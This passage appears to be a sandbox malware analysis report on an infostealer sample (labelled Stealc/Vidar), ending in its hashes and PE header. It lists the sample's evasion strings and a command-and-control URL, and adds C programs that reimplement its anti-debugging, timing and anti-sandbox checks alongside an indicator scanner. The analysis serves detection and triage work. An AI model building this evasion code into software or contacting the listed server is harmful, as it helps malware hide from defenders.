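    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

/* One measurement: two counter reads around work that is cheap natively but
 * expensive when every instruction is trapped, emulated or single-stepped. */
uint64_t timed_delta_once(void) {
    volatile uint32_t junk = 0;
    uint64_t t0 = read_counter();
    for (int i = 0; i < 16; i++) junk += (uint32_t)i;   /* stands in for the pushad/popad filler */
    uint64_t t1 = read_counter();
    return t1 - t0;
}

/* Keep the minimum of several samples so one preemption or interrupt does not
 * look like a debugger; natively the minimum is a few dozen cycles. */
uint64_t min_timed_delta(unsigned samples) {
    uint64_t best = UINT64_MAX;
    for (unsigned i = 0; i < samples; i++) {
        uint64_t d = timed_delta_once();
        if (d < best) best = d;
    }
    return best;
}

/* Decision logic kept separate so it can be exercised on constructed deltas:
 * instrumented only if even the fastest sample exceeds the threshold. */
int looks_instrumented(const uint64_t *deltas, size_t n, uint64_t threshold) {
    if (n == 0) return 0;
    uint64_t best = UINT64_MAX;
    for (size_t i = 0; i < n; i++) if (deltas[i] < best) best = deltas[i];
    return best > threshold;
}

int main(void) {
    uint64_t d[8];
    for (int i = 0; i < 8; i++) d[i] = timed_delta_once();
    /* 0x1000 ticks is an illustrative threshold, not the sample's. */
    printf("min delta %llu -> %s\n", (unsigned long long)min_timed_delta(8),
           looks_instrumented(d, 8, 0x1000) ? "instrumented" : "native");
    return 0;
}
```

Built natively the minimum delta is a few dozen to a few hundred cycles; run under single-stepping, or under a sandbox that traps rdtsc as this one did, every sample grows by orders of magnitude. Taking the minimum rather than one reading is what keeps an ordinary context switch from firing the check, and it is also why a debugger plugin that patches the counter has to return consistently small deltas, not just one.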
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 11E0A96 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 103F6CA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 11EB65E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1270667 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE1160 GetSystemInfo,ExitProcess
                Source: file.exe, file.exe, 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2254739103.0000000000838000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2254739103.0000000000896000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2254739103.0000000000863000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13554
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13551
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13566
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13606
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13571
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
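                The window classes and titles above (regmonclass, filemonclass, procmon_window_class, the Process Monitor, Registry Monitor and File Monitor title bars, ollydbg, gbdyllo) and the SoftICE device names NTICE, SICE and SIWVID are the literal strings such a checker hands to FindWindow and CreateFile, and the VBOX__, VMwareVMware, Hyper-V RAW and Oreans/WinLicense strings reported from memory earlier in this section feed the sandbox checks in the same way. Because the sample left them in the clear in memory, a dump can be triaged for them directly. The C program below is an added example, not part of the report: it scans a binary buffer case-insensitively for each indicator and reports which categories hit. The category grouping and the sample dump bytes are constructed for the example; the indicator strings themselves are the ones the report lists.

```c
/* Added example: triage a memory dump for the anti-analysis strings this report
 * attributes to file.exe. Not code from the report; categories and the sample
 * dump are constructed for illustration. */
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { IND_DEBUG_WINDOW = 1, IND_SOFTICE = 2, IND_VM = 4, IND_PROTECTOR = 8 };

typedef struct { const char *needle; int category; } indicator_t;

/* Strings taken from the report rows; the grouping is this example's. */
static const indicator_t INDICATORS[] = {
    { "regmonclass",                    IND_DEBUG_WINDOW },
    { "filemonclass",                   IND_DEBUG_WINDOW },
    { "procmon_window_class",           IND_DEBUG_WINDOW },
    { "process monitor - sysinternals", IND_DEBUG_WINDOW },
    { "ollydbg",                        IND_DEBUG_WINDOW },
    { "gbdyllo",                        IND_DEBUG_WINDOW },
    { "NTICE",                          IND_SOFTICE },
    { "SICE",                           IND_SOFTICE },
    { "SIWVID",                         IND_SOFTICE },
    { "HARDWARE\\ACPI\\DSDT\\VBOX__",   IND_VM },
    { "VMwareVMware",                   IND_VM },
    { "Hyper-V RAW",                    IND_VM },
    { "Oreans.vxd",                     IND_PROTECTOR },
    { "Software\\WinLicense",           IND_PROTECTOR },
};

/* Case-insensitive search for a needle inside a binary buffer that may contain
 * NUL bytes, so strstr() is not usable. */
static int contains_ci(const uint8_t *buf, size_t len, const char *needle) {
    size_t n = strlen(needle);
    if (n == 0 || n > len) return 0;
    for (size_t i = 0; i + n <= len; i++) {
        size_t j = 0;
        while (j < n && tolower(buf[i + j]) == tolower((unsigned char)needle[j])) j++;
        if (j == n) return 1;
    }
    return 0;
}

/* Returns a bitmask of categories hit; *hits_out receives the number of
 * distinct indicators found. */
int scan_indicators(const uint8_t *buf, size_t len, int *hits_out) {
    int mask = 0, hits = 0;
    for (size_t k = 0; k < sizeof INDICATORS / sizeof INDICATORS[0]; k++) {
        if (contains_ci(buf, len, INDICATORS[k].needle)) {
            mask |= INDICATORS[k].category;
            hits++;
        }
    }
    if (hits_out) *hits_out = hits;
    return mask;
}

/* Constructed sample "dump": NUL-separated strings plus unrelated text. */
static const uint8_t SAMPLE_DUMP[] =
    "some text\0procmon_window_class\0\\\\.\\SICE\0HARDWARE\\ACPI\\DSDT\\VBOX__\0Restart now?";

int sample_dump_mask(void) { return scan_indicators(SAMPLE_DUMP, sizeof SAMPLE_DUMP - 1, NULL); }
int sample_dump_hits(void) { int h; scan_indicators(SAMPLE_DUMP, sizeof SAMPLE_DUMP - 1, &h); return h; }

int main(void) {
    int hits = 0, mask = scan_indicators(SAMPLE_DUMP, sizeof SAMPLE_DUMP - 1, &hits);
    printf("%d indicators, categories: %s%s%s%s\n", hits,
           (mask & IND_DEBUG_WINDOW) ? "[debug-window] " : "",
           (mask & IND_SOFTICE)      ? "[softice] "      : "",
           (mask & IND_VM)           ? "[vm] "           : "",
           (mask & IND_PROTECTOR)    ? "[protector] "    : "");
    return 0;
}
```

Feed it a process dump or the unpacked image (0.2.file.exe.de0000.0.unpack) instead of SAMPLE_DUMP and the category bits tell you which evasion families are wired in before you spend time in a debugger. The short device names are matched as bare substrings, so expect the odd false positive on SICE in large text-heavy dumps; tighten the needle to the \\.\ device form if that matters.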
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE45C0 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF9750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard
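                The Anti Debugging rows describe three concrete checks: the thread is marked HideFromDebugger, ProcessDebugPort is queried three times, and function 0_2_00DF9750 reads fs:[30h], which on 32-bit Windows is the PEB pointer and the route to its BeingDebugged byte. The C program below is an added example, not code from the sample, that performs the same three checks through the documented ntdll entry points. The /proc/self/status TracerPid fallback exists only so the example also builds and runs on a Linux host; it is a portability assumption, not something the sample does.

```c
/* Added example: the three debugger checks the report records for file.exe,
 * reimplemented for reading. Not the sample's code. The TracerPid path is a
 * portability assumption so the program also runs outside Windows. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parse a /proc/<pid>/status text: returns TracerPid, 0 if untraced, -1 if the
 * field is absent. Kept separate so it can be checked on constructed input. */
long parse_tracer_pid(const char *status_text) {
    const char *p = strstr(status_text, "TracerPid:");
    if (!p) return -1;
    return strtol(p + strlen("TracerPid:"), NULL, 10);
}

#if defined(_WIN32)
#include <windows.h>
#include <winternl.h>
#include <intrin.h>

typedef NTSTATUS (NTAPI *NtQueryInformationProcess_t)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
typedef NTSTATUS (NTAPI *NtSetInformationThread_t)(HANDLE, ULONG, PVOID, ULONG);

/* PEB.BeingDebugged is the byte at offset 2 of the PEB; fs:[30h] (x86) or
 * gs:[60h] (x64) holds the PEB pointer. This is what "mov eax, fs:[30h]" reads. */
static int peb_being_debugged(void) {
#if defined(_M_IX86) || defined(__i386__)
    const unsigned char *peb = (const unsigned char *)(uintptr_t)__readfsdword(0x30);
#else
    const unsigned char *peb = (const unsigned char *)__readgsqword(0x60);
#endif
    return peb[2] != 0;
}

/* ProcessDebugPort (information class 7) is non-zero while a user-mode
 * debugger is attached; this is the "Process queried: DebugPort" row. */
static int debug_port_present(void) {
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    NtQueryInformationProcess_t q = ntdll
        ? (NtQueryInformationProcess_t)GetProcAddress(ntdll, "NtQueryInformationProcess") : NULL;
    ULONG_PTR port = 0;
    if (!q || q(GetCurrentProcess(), (PROCESSINFOCLASS)7, &port, sizeof port, NULL) != 0) return 0;
    return port != 0;
}

/* ThreadHideFromDebugger (0x11): the thread stops generating debug events,
 * which is what "Thread information set: HideFromDebugger" records. */
int hide_current_thread(void) {
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    NtSetInformationThread_t s = ntdll
        ? (NtSetInformationThread_t)GetProcAddress(ntdll, "NtSetInformationThread") : NULL;
    return s && s(GetCurrentThread(), 0x11, NULL, 0) == 0;
}

int debugger_attached(void) { return peb_being_debugged() || debug_port_present(); }

#else
int hide_current_thread(void) { return 0; }   /* no equivalent outside Windows */

/* Linux stand-in (assumption for portability): a non-zero TracerPid means a
 * ptrace-based debugger such as gdb or strace is attached. */
int debugger_attached(void) {
    char buf[4096];
    FILE *f = fopen("/proc/self/status", "r");
    if (!f) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return parse_tracer_pid(buf) > 0;
}
#endif

int main(void) {
    printf("debugger attached: %d (hide thread: %d)\n", debugger_attached(), hide_current_thread());
    return 0;
}
```

The three checks fail in different ways, which is why packers stack them: BeingDebugged is a single byte a debugger plugin can clear, ProcessDebugPort has to be answered by a kernel-side hook or a hypervisor, and a thread hidden with ThreadHideFromDebugger simply stops reporting breakpoints, so a debugger that lets the call through loses the thread rather than seeing a failed check.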

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 5176, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: file.exe, file.exe, 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: $Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF7B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.de0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.2214050807.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2254739103.0000000000838000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5176, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2214050807.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2254739103.0000000000838000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5176, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (one column per tactic; a leading number is the count of report signatures mapped to that technique, techniques without a number did not match):
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Antivirus results (Source | Detection | Scanner | Label):
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches for the other scanned categories.
URL scan results (Source | Detection | Scanner | Label):
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
http://185.215.113.37/e2b1563c6670f193.php- | file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37p | file.exe, 00000000.00000002.2254739103.000000000081E000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2254739103.000000000081E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php? | file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37/e2b1563c6670f193.phpi | file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
(The trailing characters after ".php" and ".37" are part of the strings as they were extracted from process memory.)
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1532850
                        Start date and time:2024-10-14 00:59:14 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 12s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 82
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe
                        No simulations
IP context for 185.215.113.37 (Associated sample | Detection | Threat name | Context):
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                        No context
ASN context for WHOLESALECONNECTIONSNL (Associated sample | Detection | Threat name | Context):
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
                        No context
                        No context
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.950182278094455
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'854'976 bytes
                        MD5:10f4beb1c5f54bb1d754f56785e14563
                        SHA1:c52cb5d5917e28fd1d886ddbe410bb673617e16c
                        SHA256:58faf6bf840c606c3c8852692bb7f9ae649fa927707f5546d55e68ba6c4fe8b2
                        SHA512:a595988de307c6fe99a42fa547cfc41d4686e33f8fb445687ff54b46460f88d5285c6f35f395239035c1b5d1e3b67ea47a155bc592ae10fe9728cef995510e15
                        SSDEEP:49152:cDa54V0hhKguIpT1cekJAiavfVnjbJC0v:cDaK0qgXB1kcfVjbE0
                        TLSH:D78533A50FBF242CE2C547799C22CF54297A570AFAEB5028B137CFB615706998B3D4C8
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                        Icon Hash:00928e8e8686b000
                        Entrypoint:0xaa1000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b
Entrypoint instructions (disassembly of the first bytes at the entry point, which lies in .taggant):
                        jmp 00007F3FACC4E59Ah
                        cvttps2pi mm3, qword ptr [eax+eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        jmp 00007F3FACC50595h
                        add byte ptr [ebx], cl
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], cl
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or ecx, dword ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        sub byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add dword ptr [eax+00000000h], eax
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add ecx, dword ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
